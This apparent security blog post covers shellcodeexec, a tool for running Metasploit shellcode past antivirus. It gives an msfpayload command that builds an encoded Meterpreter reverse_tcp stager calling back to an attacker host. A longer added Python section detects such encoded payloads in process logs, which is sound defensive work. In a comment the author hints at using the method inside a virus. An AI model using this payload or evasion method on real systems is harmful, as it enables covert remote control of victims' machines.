ClsHack: Computer Security Blog

Metasploit && shellcodeexec bypassing any AntiVirus


Bernardo Damele has described on his blog a new way to bypass any antivirus.
shellcodeexec is a script distributed as source code for Windows and Linux.

The features of shellcodeexec are the following:

  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to the EAX register, where the address in memory of the shellcode will be stored, to avoid having the get_pc() binary stub prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed inside a structured exception handler (SEH), so that if you wrap shellcodeexec into your own executable, it prevents the whole process from crashing in case of unexpected behaviour.

Let's see how to try it on BackBox.
Install git:
sudo apt-get install git
Download the source:
git clone https://github.com/inquisb/shellcodeexec.git
Then:
cd shellcodeexec
For a tutorial, read the README:
cat README | more

To try it we will use msfpayload:
sudo -s
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.1.100 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

And then, on Windows:
shellcodeexec [msfencode's alphanumeric-encoded payload]

The same applies to Linux: first generate the payload, then run it with shellcodeexec.
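From the defender's side, the procedure above leaves a distinctive trace: the whole alphanumeric-encoded payload is passed to shellcodeexec as a single command-line argument, so a process-creation log records an unusually long, high-entropy token made only of letters and digits. The following Python detector, written for this post as an added example (it is not code from the page or from the shellcodeexec project), scans constructed process-creation log lines for such tokens. The log format, the length and entropy thresholds, and the random alphanumeric blob standing in for an encoded payload are all assumptions made here for illustration.

```python
import math
import random
import re
import string
from collections import Counter

# One whitespace-delimited run of letters and digits (msfencode's alpha_mixed
# output consists only of such characters). Assumed token shape.
ALNUM_TOKEN = re.compile(r"[A-Za-z0-9]+")

# Thresholds are assumptions for this example, not values from the page:
# an encoded Meterpreter stager is far longer than any ordinary argument,
# and encoder output has far higher per-character entropy than a padded
# license key or a repeated filler string.
MIN_TOKEN_LENGTH = 200
MIN_ENTROPY_BITS = 3.5


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character of the given string."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def long_alnum_tokens(command_line: str) -> list:
    """Alphanumeric-only tokens in a command line that exceed MIN_TOKEN_LENGTH."""
    return [t for t in ALNUM_TOKEN.findall(command_line) if len(t) >= MIN_TOKEN_LENGTH]


def analyse_command_line(command_line: str) -> tuple:
    """Return (suspicious, reason). A long alphanumeric token is flagged only
    when its entropy is high; a long run of one repeated character is not."""
    for token in long_alnum_tokens(command_line):
        entropy = shannon_entropy(token)
        if entropy >= MIN_ENTROPY_BITS:
            return True, (f"alphanumeric blob of {len(token)} chars "
                          f"with entropy {entropy:.2f} bits/char")
    return False, ""


def parse_line(line: str) -> dict:
    """Parse the constructed log format:
    '<timestamp> host=<name> image=<path> cmdline=<full command line>'."""
    head, _, cmdline = line.partition(" cmdline=")
    parts = head.split()
    fields = dict(kv.split("=", 1) for kv in parts[1:])
    fields["timestamp"] = parts[0]
    fields["cmdline"] = cmdline
    return fields


def scan_log(lines: list) -> list:
    """Return one hit dict per log line whose command line looks suspicious."""
    hits = []
    for line in lines:
        fields = parse_line(line)
        suspicious, reason = analyse_command_line(fields["cmdline"])
        if suspicious:
            hits.append({"timestamp": fields["timestamp"],
                         "image": fields["image"], "reason": reason})
    return hits


# Constructed stand-in for an encoded payload: random letters and digits from a
# fixed seed, so the example runs offline. It is NOT an encoded payload and
# does not execute anything.
_rng = random.Random(20120122)
CONSTRUCTED_BLOB = "".join(_rng.choice(string.ascii_letters + string.digits)
                           for _ in range(420))

# Constructed sample log lines (hostnames, paths and timestamps are made up).
SAMPLE_LOG = [
    r"2012-01-22T16:16:01Z host=ws01 image=C:\Windows\System32\notepad.exe "
    r"cmdline=notepad.exe C:\Users\alice\notes.txt",
    # long but zero-entropy argument: must not be flagged
    r"2012-01-22T16:16:05Z host=ws01 image=C:\temp\setup.exe "
    r"cmdline=setup.exe /quiet /key=" + "A" * 300,
    rf"2012-01-22T16:16:09Z host=ws01 image=C:\temp\shellcodeexec.exe "
    rf"cmdline=shellcodeexec.exe {CONSTRUCTED_BLOB}",
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['image']}: {hit['reason']}")
```

Running the block reports only the shellcodeexec line; the notepad invocation and the padded license key stay quiet. This command-line heuristic complements the behavioural signal the feature list already points at: a process allocating a page as readable, writable and executable and then starting a thread in it is exactly what endpoint monitoring that hooks memory allocation looks for, independently of what the payload is encoded as.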

Have fun :D


This entry was posted on Sunday, January 22nd, 2012 at 4:16 pm and is filed under GNU/Linux, Hacking, Software.

  • http://twitter.com/PROPPETTO domenico michienzi

    sorry for my ignorance, but what do you mean by “then on Windows”?

    • ClsHackBlog

      On Windows you will run the program shellcodeexec [msfencode's alphanumeric-encoded payload] :)


  • http://twitter.com/PROPPETTO domenico michienzi

    from a terminal??

    • ClsHackBlog

      yes ;) naturally this is the procedure for testing it; inside an eventual virus you have to change things a bit ;)
